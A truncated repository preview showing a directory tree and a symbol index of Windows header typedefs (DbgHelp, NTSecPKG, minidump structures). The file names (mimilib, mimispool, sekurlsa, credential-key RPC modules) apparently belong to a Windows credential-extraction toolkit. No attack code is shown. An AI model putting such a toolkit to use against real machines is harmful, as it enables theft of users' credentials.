├── kappfree.c │ ├── kcredentialprovider.c │ ├── kcredentialprovider.h │ ├── kdhcp.c │ ├── kdhcp.h │ ├── kdns.c │ ├── kdns.h │ ├── kfilt.c │ ├── kfilt.h │ ├── knp.c │ ├── knp.h │ ├── kssp.c │ ├── kssp.h │ ├── ksub.c │ ├── ksub.h │ ├── mimilib.def │ ├── mimilib.rc │ ├── mimilib.vcxproj │ ├── mimilib.vcxproj.filters │ ├── sekurlsadbg/ │ │ ├── kuhl_m_sekurlsa_nt6.c │ │ ├── kuhl_m_sekurlsa_nt6.h │ │ ├── kuhl_m_sekurlsa_packages.c │ │ ├── kuhl_m_sekurlsa_packages.h │ │ ├── kuhl_m_sekurlsa_utils.c │ │ ├── kuhl_m_sekurlsa_utils.h │ │ ├── kull_m_rpc.c │ │ ├── kull_m_rpc.h │ │ ├── kull_m_rpc_ms-credentialkeys.c │ │ ├── kull_m_rpc_ms-credentialkeys.h │ │ ├── kwindbg.c │ │ └── kwindbg.h │ ├── utils.c │ └── utils.h ├── mimilove/ │ ├── mimilove.c │ ├── mimilove.h │ ├── mimilove.rc │ ├── mimilove.vcxproj │ └── mimilove.vcxproj.filters ├── mimispool/ │ ├── README.md │ ├── mimispool.c │ ├── mimispool.def │ ├── mimispool.h │ ├── mimispool.rc │ ├── mimispool.vcxproj │ └── mimispool.vcxproj.filters ├── modules/ │ ├── kull_m_acr.c │ ├── kull_m_acr.h │ ├── kull_m_asn1.c │ ├── kull_m_asn1.h │ ├── kull_m_busylight.c │ ├── kull_m_busylight.h │ ├── kull_m_cabinet.c │ ├── kull_m_cabinet.h │ ├── kull_m_cred.c │ ├── kull_m_cred.h │ ├── kull_m_crypto.c │ ├── kull_m_crypto.h │ ├── kull_m_crypto_ngc.c │ ├── kull_m_crypto_ngc.h │ ├── kull_m_crypto_remote.c │ ├── kull_m_crypto_remote.h │ ├── kull_m_crypto_sk.c │ ├── kull_m_crypto_sk.h │ ├── kull_m_crypto_system.h │ ├── kull_m_dpapi.c │ ├── kull_m_dpapi.h │ ├── kull_m_file.c │ ├── kull_m_file.h │ ├── kull_m_handle.c │ ├── kull_m_handle.h │ ├── kull_m_hid.c │ ├── kull_m_hid.h │ ├── kull_m_kernel.c │ ├── kull_m_kernel.h │ ├── kull_m_key.c │ ├── kull_m_key.h │ ├── kull_m_ldap.c │ ├── kull_m_ldap.h │ ├── kull_m_memory.c │ ├── kull_m_memory.h │ ├── kull_m_mifare.h │ ├── kull_m_minidump.c │ ├── kull_m_minidump.h │ ├── kull_m_net.c │ ├── kull_m_net.h │ ├── kull_m_output.c │ ├── kull_m_output.h │ ├── kull_m_patch.c │ ├── kull_m_patch.h │ ├── kull_m_pipe.c │ ├── kull_m_pipe.h │ ├── kull_m_pn532.c │ ├── kull_m_pn532.h │ ├── kull_m_process.c │ ├── kull_m_process.h │ ├── kull_m_rdm.c │ ├── kull_m_rdm.h │ ├── kull_m_registry.c │ ├── kull_m_registry.h │ ├── kull_m_registry_structures.h │ ├── kull_m_remotelib.c │ ├── kull_m_remotelib.h │ ├── kull_m_samlib.h │ ├── kull_m_service.c │ ├── kull_m_service.h │ ├── kull_m_sr98.c │ ├── kull_m_sr98.h │ ├── kull_m_string.c │ ├── kull_m_string.h │ ├── kull_m_token.c │ ├── kull_m_token.h │ ├── kull_m_xml.c │ ├── kull_m_xml.h │ ├── rpc/ │ │ ├── kull_m_rpc.c │ │ ├── kull_m_rpc.h │ │ ├── kull_m_rpc_bkrp.c │ │ ├── kull_m_rpc_bkrp.h │ │ ├── kull_m_rpc_dpapi-entries.c │ │ ├── kull_m_rpc_dpapi-entries.h │ │ ├── kull_m_rpc_drsr.c │ │ ├── kull_m_rpc_drsr.h │ │ ├── kull_m_rpc_mimicom.c │ │ ├── kull_m_rpc_mimicom.h │ │ ├── kull_m_rpc_ms-bkrp.h │ │ ├── kull_m_rpc_ms-bkrp_c.c │ │ ├── kull_m_rpc_ms-claims.c │ │ ├── kull_m_rpc_ms-claims.h │ │ ├── kull_m_rpc_ms-credentialkeys.c │ │ ├── kull_m_rpc_ms-credentialkeys.h │ │ ├── kull_m_rpc_ms-dcom_IObjectExporter.h │ │ ├── kull_m_rpc_ms-dcom_IObjectExporter_c.c │ │ ├── kull_m_rpc_ms-drsr.h │ │ ├── kull_m_rpc_ms-drsr_c.c │ │ ├── kull_m_rpc_ms-efsr.h │ │ ├── kull_m_rpc_ms-efsr_c.c │ │ ├── kull_m_rpc_ms-nrpc.h │ │ ├── kull_m_rpc_ms-nrpc_c.c │ │ ├── kull_m_rpc_ms-odj.c │ │ ├── kull_m_rpc_ms-odj.h │ │ ├── kull_m_rpc_ms-pac.c │ │ ├── kull_m_rpc_ms-pac.h │ │ ├── kull_m_rpc_ms-par.h │ │ ├── kull_m_rpc_ms-par_c.c │ │ ├── kull_m_rpc_ms-rprn.c │ │ └── kull_m_rpc_ms-rprn.h │ ├── sqlite3.c │ └── sqlite3.h ├── notrunk.lst └── trunk.lst
Showing preview only (717K chars total). Download the full file or copy to clipboard to get everything.
SYMBOL INDEX (7902 symbols across 258 files)
FILE: inc/DbgHelp.h
type LOADED_IMAGE (line 133) | typedef struct _LOADED_IMAGE {
type IMAGE_DEBUG_INFORMATION (line 376) | typedef struct _IMAGE_DEBUG_INFORMATION {
type MODLOAD_DATA (line 548) | typedef struct _MODLOAD_DATA {
type MODLOAD_CVMISC (line 556) | typedef struct _MODLOAD_CVMISC {
type MODLOAD_PDBGUID_PDBAGE (line 565) | typedef struct _MODLOAD_PDBGUID_PDBAGE {
type ADDRESS_MODE (line 574) | typedef enum {
type ADDRESS64 (line 581) | typedef struct _tagADDRESS64 {
type ADDRESS (line 591) | typedef struct _tagADDRESS {
function Address32To64 (line 597) | __inline
function Address64To32 (line 609) | __inline
type KDHELP64 (line 633) | typedef struct _KDHELP64 {
type KDHELP (line 698) | typedef struct _KDHELP {
function KdHelp32To64 (line 758) | __inline
type STACKFRAME64 (line 778) | typedef struct _tagSTACKFRAME64 {
type STACKFRAME (line 796) | typedef struct _tagSTACKFRAME {
type BOOL (line 812) | typedef
type PVOID (line 822) | typedef
type DWORD64 (line 829) | typedef
type DWORD64 (line 836) | typedef
type BOOL (line 869) | typedef
type PVOID (line 879) | typedef
type DWORD (line 886) | typedef
type DWORD (line 893) | typedef
type API_VERSION (line 920) | typedef struct API_VERSION {
type SymTagEnum (line 1083) | enum SymTagEnum
type SYM_TYPE (line 1151) | typedef enum {
type IMAGEHLP_SYMBOL64 (line 1168) | typedef struct _IMAGEHLP_SYMBOL64 {
type IMAGEHLP_SYMBOL64_PACKAGE (line 1177) | typedef struct _IMAGEHLP_SYMBOL64_PACKAGE {
type IMAGEHLP_SYMBOLW64 (line 1182) | typedef struct _IMAGEHLP_SYMBOLW64 {
type IMAGEHLP_SYMBOLW64_PACKAGE (line 1191) | typedef struct _IMAGEHLP_SYMBOLW64_PACKAGE {
type IMAGEHLP_SYMBOL (line 1209) | typedef struct _IMAGEHLP_SYMBOL {
type IMAGEHLP_SYMBOL_PACKAGE (line 1218) | typedef struct _IMAGEHLP_SYMBOL_PACKAGE {
type IMAGEHLP_SYMBOLW (line 1223) | typedef struct _IMAGEHLP_SYMBOLW {
type IMAGEHLP_SYMBOLW_PACKAGE (line 1232) | typedef struct _IMAGEHLP_SYMBOLW_PACKAGE {
type IMAGEHLP_MODULE64 (line 1243) | typedef struct _IMAGEHLP_MODULE64 {
type IMAGEHLP_MODULEW64 (line 1271) | typedef struct _IMAGEHLP_MODULEW64 {
type IMAGEHLP_MODULE (line 1305) | typedef struct _IMAGEHLP_MODULE {
type IMAGEHLP_MODULEW (line 1318) | typedef struct _IMAGEHLP_MODULEW {
type IMAGEHLP_LINE64 (line 1336) | typedef struct _IMAGEHLP_LINE64 {
type IMAGEHLP_LINEW64 (line 1344) | typedef struct _IMAGEHLP_LINEW64 {
type IMAGEHLP_LINE (line 1356) | typedef struct _IMAGEHLP_LINE {
type IMAGEHLP_LINEW (line 1364) | typedef struct _IMAGEHLP_LINEW {
type SOURCEFILE (line 1377) | typedef struct _SOURCEFILE {
type SOURCEFILEW (line 1382) | typedef struct _SOURCEFILEW {
type IMAGEHLP_CBA_READ_MEMORY (line 1405) | typedef struct _IMAGEHLP_CBA_READ_MEMORY {
type IMAGEHLP_CBA_EVENT (line 1424) | typedef struct _IMAGEHLP_CBA_EVENT {
type IMAGEHLP_CBA_EVENTW (line 1431) | typedef struct _IMAGEHLP_CBA_EVENTW {
type IMAGEHLP_DEFERRED_SYMBOL_LOAD64 (line 1438) | typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOAD64 {
type IMAGEHLP_DEFERRED_SYMBOL_LOADW64 (line 1449) | typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOADW64 {
type IMAGEHLP_DEFERRED_SYMBOL_LOAD (line 1467) | typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOAD {
type IMAGEHLP_DUPLICATE_SYMBOL64 (line 1478) | typedef struct _IMAGEHLP_DUPLICATE_SYMBOL64 {
type IMAGEHLP_DUPLICATE_SYMBOL (line 1489) | typedef struct _IMAGEHLP_DUPLICATE_SYMBOL {
type DBG_HD_ENUM (line 1535) | typedef enum {
type OMAP (line 1542) | typedef struct _OMAP {
type SRCCODEINFO (line 1822) | typedef struct _SRCCODEINFO {
type SRCCODEINFOW (line 1832) | typedef struct _SRCCODEINFOW {
type IMAGEHLP_SYMBOL_SRC (line 2333) | typedef struct _IMAGEHLP_SYMBOL_SRC {
type MODULE_TYPE_INFO (line 2339) | typedef struct _MODULE_TYPE_INFO { // AKA TYPTYP
type SYMBOL_INFO (line 2345) | typedef struct _SYMBOL_INFO {
type SYMBOL_INFO_PACKAGE (line 2363) | typedef struct _SYMBOL_INFO_PACKAGE {
type SYMBOL_INFOW (line 2368) | typedef struct _SYMBOL_INFOW {
type SYMBOL_INFO_PACKAGEW (line 2386) | typedef struct _SYMBOL_INFO_PACKAGEW {
type IMAGEHLP_STACK_FRAME (line 2391) | typedef struct _IMAGEHLP_STACK_FRAME
type VOID (line 2405) | typedef VOID IMAGEHLP_CONTEXT, *PIMAGEHLP_CONTEXT;
type IMAGEHLP_SYMBOL_TYPE_INFO (line 2651) | typedef enum _IMAGEHLP_SYMBOL_TYPE_INFO {
type TI_FINDCHILDREN_PARAMS (line 2688) | typedef struct _TI_FINDCHILDREN_PARAMS {
type IMAGEHLP_GET_TYPE_INFO_PARAMS (line 2707) | typedef struct _IMAGEHLP_GET_TYPE_INFO_PARAMS {
type ULONG64 (line 2850) | typedef BOOL (WINAPI *SYMADDSOURCESTREAM)(HANDLE, ULONG64, PCSTR, PBYTE,...
type ULONG64 (line 2862) | typedef BOOL (WINAPI *SYMADDSOURCESTREAMA)(HANDLE, ULONG64, PCSTR, PBYTE...
type SYMSRV_INDEX_INFO (line 2968) | typedef struct {
type SYMSRV_INDEX_INFOW (line 2981) | typedef struct {
type DBG_SF_ENUM (line 3050) | typedef enum {
type PCSTR (line 3168) | typedef BOOL (WINAPI *PSYMBOLSERVERPROC)(PCSTR, PCSTR, PVOID, DWORD, DWO...
type PCSTR (line 3169) | typedef BOOL (WINAPI *PSYMBOLSERVERPROCA)(PCSTR, PCSTR, PVOID, DWORD, DW...
type PCWSTR (line 3170) | typedef BOOL (WINAPI *PSYMBOLSERVERPROCW)(PCWSTR, PCWSTR, PVOID, DWORD, ...
type PCSTR (line 3171) | typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROC)(PCSTR, PCSTR, PCSTR, PSTR);
type PCSTR (line 3172) | typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROCA)(PCSTR, PCSTR, PCSTR, PS...
type PCWSTR (line 3173) | typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROCW)(PCWSTR, PCWSTR, PCWSTR,...
type PVOID (line 3184) | typedef BOOL (WINAPI *PSYMBOLSERVERDELTANAME)(PCSTR, PVOID, DWORD, DWORD...
type PVOID (line 3185) | typedef BOOL (WINAPI *PSYMBOLSERVERDELTANAMEW)(PCWSTR, PVOID, DWORD, DWO...
type PCSTR (line 3186) | typedef BOOL (WINAPI *PSYMBOLSERVERGETSUPPLEMENT)(PCSTR, PCSTR, PCSTR, P...
type PCWSTR (line 3187) | typedef BOOL (WINAPI *PSYMBOLSERVERGETSUPPLEMENTW)(PCWSTR, PCWSTR, PCWST...
type PCSTR (line 3188) | typedef BOOL (WINAPI *PSYMBOLSERVERSTORESUPPLEMENT)(PCSTR, PCSTR, PCSTR,...
type PCWSTR (line 3189) | typedef BOOL (WINAPI *PSYMBOLSERVERSTORESUPPLEMENTW)(PCWSTR, PCWSTR, PCW...
type DWORD (line 3190) | typedef BOOL (WINAPI *PSYMBOLSERVERGETINDEXSTRING)(PVOID, DWORD, DWORD, ...
type DWORD (line 3191) | typedef BOOL (WINAPI *PSYMBOLSERVERGETINDEXSTRINGW)(PVOID, DWORD, DWORD,...
type PCSTR (line 3192) | typedef BOOL (WINAPI *PSYMBOLSERVERSTOREFILE)(PCSTR, PCSTR, PVOID, DWORD...
type PCWSTR (line 3193) | typedef BOOL (WINAPI *PSYMBOLSERVERSTOREFILEW)(PCWSTR, PCWSTR, PVOID, DW...
type DWORD (line 3582) | typedef DWORD RVA;
type ULONG64 (line 3583) | typedef ULONG64 RVA64;
type MINIDUMP_LOCATION_DESCRIPTOR (line 3585) | typedef struct _MINIDUMP_LOCATION_DESCRIPTOR {
type MINIDUMP_LOCATION_DESCRIPTOR64 (line 3590) | typedef struct _MINIDUMP_LOCATION_DESCRIPTOR64 {
type MINIDUMP_MEMORY_DESCRIPTOR (line 3596) | typedef struct _MINIDUMP_MEMORY_DESCRIPTOR {
type MINIDUMP_MEMORY_DESCRIPTOR64 (line 3606) | typedef struct _MINIDUMP_MEMORY_DESCRIPTOR64 {
type MINIDUMP_HEADER (line 3612) | typedef struct _MINIDUMP_HEADER {
type MINIDUMP_DIRECTORY (line 3630) | typedef struct _MINIDUMP_DIRECTORY {
type MINIDUMP_STRING (line 3636) | typedef struct _MINIDUMP_STRING {
type MINIDUMP_STREAM_TYPE (line 3651) | typedef enum _MINIDUMP_STREAM_TYPE {
type CPU_INFORMATION (line 3709) | typedef union _CPU_INFORMATION {
type MINIDUMP_SYSTEM_INFO (line 3758) | typedef struct _MINIDUMP_SYSTEM_INFO {
type MINIDUMP_THREAD (line 3821) | typedef struct _MINIDUMP_THREAD {
type MINIDUMP_THREAD_LIST (line 3835) | typedef struct _MINIDUMP_THREAD_LIST {
type MINIDUMP_THREAD_EX (line 3841) | typedef struct _MINIDUMP_THREAD_EX {
type MINIDUMP_THREAD_EX_LIST (line 3856) | typedef struct _MINIDUMP_THREAD_EX_LIST {
type MINIDUMP_EXCEPTION (line 3866) | typedef struct _MINIDUMP_EXCEPTION {
type MINIDUMP_EXCEPTION_STREAM (line 3884) | typedef struct MINIDUMP_EXCEPTION_STREAM {
type MINIDUMP_MODULE (line 3899) | typedef struct _MINIDUMP_MODULE {
type MINIDUMP_MODULE_LIST (line 3917) | typedef struct _MINIDUMP_MODULE_LIST {
type MINIDUMP_MEMORY_LIST (line 3927) | typedef struct _MINIDUMP_MEMORY_LIST {
type MINIDUMP_MEMORY64_LIST (line 3932) | typedef struct _MINIDUMP_MEMORY64_LIST {
type MINIDUMP_EXCEPTION_INFORMATION (line 3943) | typedef struct _MINIDUMP_EXCEPTION_INFORMATION {
type MINIDUMP_EXCEPTION_INFORMATION64 (line 3949) | typedef struct _MINIDUMP_EXCEPTION_INFORMATION64 {
type MINIDUMP_HANDLE_OBJECT_INFORMATION_TYPE (line 3966) | typedef enum _MINIDUMP_HANDLE_OBJECT_INFORMATION_TYPE {
type MINIDUMP_HANDLE_OBJECT_INFORMATION (line 3976) | typedef struct _MINIDUMP_HANDLE_OBJECT_INFORMATION {
type MINIDUMP_HANDLE_DESCRIPTOR (line 3983) | typedef struct _MINIDUMP_HANDLE_DESCRIPTOR {
type MINIDUMP_HANDLE_DESCRIPTOR_2 (line 3993) | typedef struct _MINIDUMP_HANDLE_DESCRIPTOR_2 {
type MINIDUMP_HANDLE_DESCRIPTOR_2 (line 4006) | typedef MINIDUMP_HANDLE_DESCRIPTOR_2 MINIDUMP_HANDLE_DESCRIPTOR_N;
type MINIDUMP_HANDLE_DESCRIPTOR_N (line 4007) | typedef MINIDUMP_HANDLE_DESCRIPTOR_N *PMINIDUMP_HANDLE_DESCRIPTOR_N;
type MINIDUMP_HANDLE_DATA_STREAM (line 4009) | typedef struct _MINIDUMP_HANDLE_DATA_STREAM {
type MINIDUMP_HANDLE_OPERATION_LIST (line 4022) | typedef struct _MINIDUMP_HANDLE_OPERATION_LIST {
type MINIDUMP_FUNCTION_TABLE_DESCRIPTOR (line 4034) | typedef struct _MINIDUMP_FUNCTION_TABLE_DESCRIPTOR {
type MINIDUMP_FUNCTION_TABLE_STREAM (line 4042) | typedef struct _MINIDUMP_FUNCTION_TABLE_STREAM {
type MINIDUMP_UNLOADED_MODULE (line 4059) | typedef struct _MINIDUMP_UNLOADED_MODULE {
type MINIDUMP_UNLOADED_MODULE_LIST (line 4072) | typedef struct _MINIDUMP_UNLOADED_MODULE_LIST {
type MINIDUMP_MISC_INFO (line 4094) | typedef struct _MINIDUMP_MISC_INFO {
type MINIDUMP_MISC_INFO_2 (line 4103) | typedef struct _MINIDUMP_MISC_INFO_2 {
type MINIDUMP_MISC_INFO_3 (line 4117) | typedef struct _MINIDUMP_MISC_INFO_3 {
type MINIDUMP_MISC_INFO_3 (line 4137) | typedef MINIDUMP_MISC_INFO_3 MINIDUMP_MISC_INFO_N;
type MINIDUMP_MISC_INFO_N (line 4138) | typedef MINIDUMP_MISC_INFO_N* PMINIDUMP_MISC_INFO_N;
type MINIDUMP_MEMORY_INFO (line 4148) | typedef struct _MINIDUMP_MEMORY_INFO {
type MINIDUMP_MEMORY_INFO_LIST (line 4160) | typedef struct _MINIDUMP_MEMORY_INFO_LIST {
type MINIDUMP_THREAD_INFO (line 4182) | typedef struct _MINIDUMP_THREAD_INFO {
type MINIDUMP_THREAD_INFO_LIST (line 4195) | typedef struct _MINIDUMP_THREAD_INFO_LIST {
type MINIDUMP_TOKEN_INFO_HEADER (line 4204) | typedef struct _MINIDUMP_TOKEN_INFO_HEADER {
type MINIDUMP_TOKEN_INFO_LIST (line 4210) | typedef struct _MINIDUMP_TOKEN_INFO_LIST {
type MINIDUMP_USER_RECORD (line 4221) | typedef struct _MINIDUMP_USER_RECORD {
type MINIDUMP_USER_STREAM (line 4227) | typedef struct _MINIDUMP_USER_STREAM {
type MINIDUMP_USER_STREAM_INFORMATION (line 4235) | typedef struct _MINIDUMP_USER_STREAM_INFORMATION {
type MINIDUMP_CALLBACK_TYPE (line 4244) | typedef enum _MINIDUMP_CALLBACK_TYPE {
type MINIDUMP_THREAD_CALLBACK (line 4264) | typedef struct _MINIDUMP_THREAD_CALLBACK {
type MINIDUMP_THREAD_EX_CALLBACK (line 4274) | typedef struct _MINIDUMP_THREAD_EX_CALLBACK {
type MINIDUMP_INCLUDE_THREAD_CALLBACK (line 4286) | typedef struct _MINIDUMP_INCLUDE_THREAD_CALLBACK {
type THREAD_WRITE_FLAGS (line 4291) | typedef enum _THREAD_WRITE_FLAGS {
type MINIDUMP_MODULE_CALLBACK (line 4301) | typedef struct _MINIDUMP_MODULE_CALLBACK {
type MINIDUMP_INCLUDE_MODULE_CALLBACK (line 4315) | typedef struct _MINIDUMP_INCLUDE_MODULE_CALLBACK {
type MODULE_WRITE_FLAGS (line 4320) | typedef enum _MODULE_WRITE_FLAGS {
type MINIDUMP_IO_CALLBACK (line 4331) | typedef struct _MINIDUMP_IO_CALLBACK {
type MINIDUMP_READ_MEMORY_FAILURE_CALLBACK (line 4339) | typedef struct _MINIDUMP_READ_MEMORY_FAILURE_CALLBACK
type MINIDUMP_CALLBACK_INPUT (line 4348) | typedef struct _MINIDUMP_CALLBACK_INPUT {
type MINIDUMP_CALLBACK_OUTPUT (line 4365) | typedef struct _MINIDUMP_CALLBACK_OUTPUT {
type MINIDUMP_TYPE (line 4463) | typedef enum _MINIDUMP_TYPE {
type MINIDUMP_SECONDARY_FLAGS (line 4498) | typedef enum _MINIDUMP_SECONDARY_FLAGS {
type MINIDUMP_CALLBACK_INFORMATION (line 4519) | typedef struct _MINIDUMP_CALLBACK_INFORMATION {
FILE: inc/DhcpSSdk.h
type DWORD (line 30) | typedef DWORD DHCP_IP_ADDRESS;
type DHCP_SERVER_OPTIONS (line 31) | typedef struct _DHCP_SERVER_OPTIONS {
type DHCP_CALLOUT_TABLE (line 426) | typedef
FILE: inc/DsGetDC.h
type DOMAIN_CONTROLLER_INFOA (line 103) | typedef struct _DOMAIN_CONTROLLER_INFOA {
type DOMAIN_CONTROLLER_INFOW (line 115) | typedef struct _DOMAIN_CONTROLLER_INFOW {
type DS_DOMAIN_TRUSTSW (line 331) | typedef struct _DS_DOMAIN_TRUSTSW {
type DS_DOMAIN_TRUSTSA (line 402) | typedef struct _DS_DOMAIN_TRUSTSA {
FILE: inc/Fci.h
type BOOL (line 42) | typedef int BOOL;
type BYTE (line 43) | typedef unsigned char BYTE;
type UINT (line 44) | typedef unsigned int UINT;
type USHORT (line 45) | typedef unsigned short USHORT;
type ULONG (line 46) | typedef unsigned long ULONG;
type CHECKSUM (line 49) | typedef unsigned long CHECKSUM;
type UOFF (line 51) | typedef unsigned long UOFF;
type COFF (line 52) | typedef unsigned long COFF;
type ERF (line 73) | typedef struct {
type ERF (line 83) | typedef ERF FAR *PERF;
type TCOMP (line 112) | typedef unsigned short TCOMP;
type __nullterminated (line 201) | typedef __nullterminated char* LPSTR;
type FCIERROR (line 218) | typedef enum {
type CCAB (line 278) | typedef struct {
type CCAB (line 301) | typedef CCAB *PCCAB;
FILE: inc/Midles.h
type MIDL_ES_CODE (line 32) | typedef enum
type MIDL_ES_HANDLE_STYLE (line 39) | typedef enum
type handle_t (line 62) | typedef handle_t MIDL_ES_HANDLE;
type MIDL_TYPE_PICKLING_INFO (line 64) | typedef struct _MIDL_TYPE_PICKLING_INFO
FILE: inc/NTSecPKG.h
type PVOID (line 36) | typedef PVOID *PLSA_CLIENT_REQUEST;
type LSA_TOKEN_INFORMATION_TYPE (line 45) | typedef enum _LSA_TOKEN_INFORMATION_TYPE {
type LSA_TOKEN_INFORMATION_NULL (line 61) | typedef struct _LSA_TOKEN_INFORMATION_NULL {
type LSA_TOKEN_INFORMATION_V1 (line 94) | typedef struct _LSA_TOKEN_INFORMATION_V1 {
type LSA_TOKEN_INFORMATION_V1 (line 188) | typedef LSA_TOKEN_INFORMATION_V1 LSA_TOKEN_INFORMATION_V2, *PLSA_TOKEN_I...
type LSA_CREATE_LOGON_SESSION (line 284) | typedef LSA_CREATE_LOGON_SESSION * PLSA_CREATE_LOGON_SESSION;
type LSA_DELETE_LOGON_SESSION (line 285) | typedef LSA_DELETE_LOGON_SESSION * PLSA_DELETE_LOGON_SESSION;
type LSA_ADD_CREDENTIAL (line 286) | typedef LSA_ADD_CREDENTIAL * PLSA_ADD_CREDENTIAL;
type LSA_GET_CREDENTIALS (line 287) | typedef LSA_GET_CREDENTIALS * PLSA_GET_CREDENTIALS;
type LSA_DELETE_CREDENTIAL (line 288) | typedef LSA_DELETE_CREDENTIAL * PLSA_DELETE_CREDENTIAL;
type LSA_ALLOCATE_LSA_HEAP (line 289) | typedef LSA_ALLOCATE_LSA_HEAP * PLSA_ALLOCATE_LSA_HEAP;
type LSA_FREE_LSA_HEAP (line 290) | typedef LSA_FREE_LSA_HEAP * PLSA_FREE_LSA_HEAP;
type LSA_ALLOCATE_PRIVATE_HEAP (line 291) | typedef LSA_ALLOCATE_PRIVATE_HEAP * PLSA_ALLOCATE_PRIVATE_HEAP;
type LSA_FREE_PRIVATE_HEAP (line 292) | typedef LSA_FREE_PRIVATE_HEAP * PLSA_FREE_PRIVATE_HEAP;
type LSA_ALLOCATE_CLIENT_BUFFER (line 293) | typedef LSA_ALLOCATE_CLIENT_BUFFER * PLSA_ALLOCATE_CLIENT_BUFFER;
type LSA_FREE_CLIENT_BUFFER (line 294) | typedef LSA_FREE_CLIENT_BUFFER * PLSA_FREE_CLIENT_BUFFER;
type LSA_COPY_TO_CLIENT_BUFFER (line 295) | typedef LSA_COPY_TO_CLIENT_BUFFER * PLSA_COPY_TO_CLIENT_BUFFER;
type LSA_COPY_FROM_CLIENT_BUFFER (line 296) | typedef LSA_COPY_FROM_CLIENT_BUFFER * PLSA_COPY_FROM_CLIENT_BUFFER;
type LSA_DISPATCH_TABLE (line 302) | typedef struct _LSA_DISPATCH_TABLE {
type LSA_AP_CALL_PACKAGE (line 418) | typedef LSA_AP_CALL_PACKAGE LSA_AP_CALL_PACKAGE_UNTRUSTED;
type LSA_AP_INITIALIZE_PACKAGE (line 420) | typedef LSA_AP_INITIALIZE_PACKAGE * PLSA_AP_INITIALIZE_PACKAGE;
type LSA_AP_LOGON_USER (line 421) | typedef LSA_AP_LOGON_USER * PLSA_AP_LOGON_USER;
type LSA_AP_LOGON_USER_EX (line 422) | typedef LSA_AP_LOGON_USER_EX * PLSA_AP_LOGON_USER_EX;
type LSA_AP_CALL_PACKAGE (line 423) | typedef LSA_AP_CALL_PACKAGE * PLSA_AP_CALL_PACKAGE;
type LSA_AP_CALL_PACKAGE_PASSTHROUGH (line 424) | typedef LSA_AP_CALL_PACKAGE_PASSTHROUGH * PLSA_AP_CALL_PACKAGE_PASSTHROUGH;
type LSA_AP_LOGON_TERMINATED (line 425) | typedef LSA_AP_LOGON_TERMINATED * PLSA_AP_LOGON_TERMINATED;
type LSA_AP_CALL_PACKAGE_UNTRUSTED (line 426) | typedef LSA_AP_CALL_PACKAGE_UNTRUSTED * PLSA_AP_CALL_PACKAGE_UNTRUSTED;
type NTSTATUS (line 432) | typedef NTSTATUS (*PSAM_CREDENTIAL_UPDATE_NOTIFY_ROUTINE) (
type BOOLEAN (line 447) | typedef BOOLEAN (*PSAM_CREDENTIAL_UPDATE_REGISTER_ROUTINE) (
type VOID (line 453) | typedef VOID (*PSAM_CREDENTIAL_UPDATE_FREE_ROUTINE) (
type SAM_REGISTER_MAPPING_ELEMENT (line 459) | typedef struct {
type SAM_REGISTER_MAPPING_LIST (line 465) | typedef struct {
type SAM_REGISTER_MAPPING_TABLE (line 470) | typedef struct {
type NTSTATUS (line 475) | typedef NTSTATUS (*PSAM_CREDENTIAL_UPDATE_REGISTER_MAPPED_ENTRYPOINTS_RO...
type PVOID (line 488) | typedef PVOID SEC_THREAD_START;
type PVOID (line 489) | typedef PVOID SEC_ATTRS;
type LPTHREAD_START_ROUTINE (line 491) | typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
type LPSECURITY_ATTRIBUTES (line 492) | typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
type SECPKG_CLIENT_INFO (line 507) | typedef struct _SECPKG_CLIENT_INFO {
type SECPKG_CALL_INFO (line 533) | typedef struct _SECPKG_CALL_INFO {
type SECPKG_SUPPLEMENTAL_CRED (line 559) | typedef struct _SECPKG_SUPPLEMENTAL_CRED {
type SECPKG_BYTE_VECTOR (line 568) | typedef struct _SECPKG_BYTE_VECTOR
type SECPKG_SHORT_VECTOR (line 574) | typedef struct _SECPKG_SHORT_VECTOR
type SECPKG_SUPPLIED_CREDENTIAL (line 584) | typedef struct _SECPKG_SUPPLIED_CREDENTIAL {
type SECPKG_CREDENTIAL (line 605) | typedef struct _SECPKG_CREDENTIAL {
type ULONG_PTR (line 623) | typedef ULONG_PTR LSA_SEC_HANDLE;
type LSA_SEC_HANDLE (line 624) | typedef LSA_SEC_HANDLE * PLSA_SEC_HANDLE;
type SECPKG_SUPPLEMENTAL_CRED_ARRAY (line 625) | typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
type LSA_CALLBACK_FUNCTION (line 656) | typedef LSA_CALLBACK_FUNCTION * PLSA_CALLBACK_FUNCTION;
type SECPKG_PRIMARY_CRED (line 678) | typedef struct _SECPKG_PRIMARY_CRED {
type SECPKG_PARAMETERS (line 710) | typedef struct _SECPKG_PARAMETERS {
type SECPKG_EXTENDED_INFORMATION_CLASS (line 725) | typedef enum _SECPKG_EXTENDED_INFORMATION_CLASS {
type SECPKG_GSS_INFO (line 735) | typedef struct _SECPKG_GSS_INFO {
type SECPKG_CONTEXT_THUNKS (line 740) | typedef struct _SECPKG_CONTEXT_THUNKS {
type SECPKG_MUTUAL_AUTH_LEVEL (line 745) | typedef struct _SECPKG_MUTUAL_AUTH_LEVEL {
type SECPKG_WOW_CLIENT_DLL (line 749) | typedef struct _SECPKG_WOW_CLIENT_DLL {
type SECPKG_SERIALIZED_OID (line 755) | typedef struct _SECPKG_SERIALIZED_OID {
type SECPKG_EXTRA_OIDS (line 761) | typedef struct _SECPKG_EXTRA_OIDS {
type SECPKG_NEGO2_INFO (line 767) | typedef struct _SECPKG_NEGO2_INFO {
type SECPKG_EXTENDED_INFORMATION (line 772) | typedef struct _SECPKG_EXTENDED_INFORMATION {
type SECPKG_TARGETINFO (line 784) | typedef struct _SECPKG_TARGETINFO
type SecPkgContext_SaslContext (line 792) | typedef struct _SecPkgContext_SaslContext {
type SECURITY_USER_DATA (line 807) | typedef struct _SECURITY_USER_DATA {
type SECURITY_USER_DATA (line 814) | typedef SECURITY_USER_DATA SecurityUserData, * PSecurityUserData;
type SECPKG_SESSIONINFO_TYPE (line 912) | typedef enum _SECPKG_SESSIONINFO_TYPE {
type SECPKG_NAME_TYPE (line 1010) | typedef enum _SECPKG_NAME_TYPE {
type SECPKG_EVENT_PACKAGE_CHANGE (line 1127) | typedef struct _SECPKG_EVENT_PACKAGE_CHANGE {
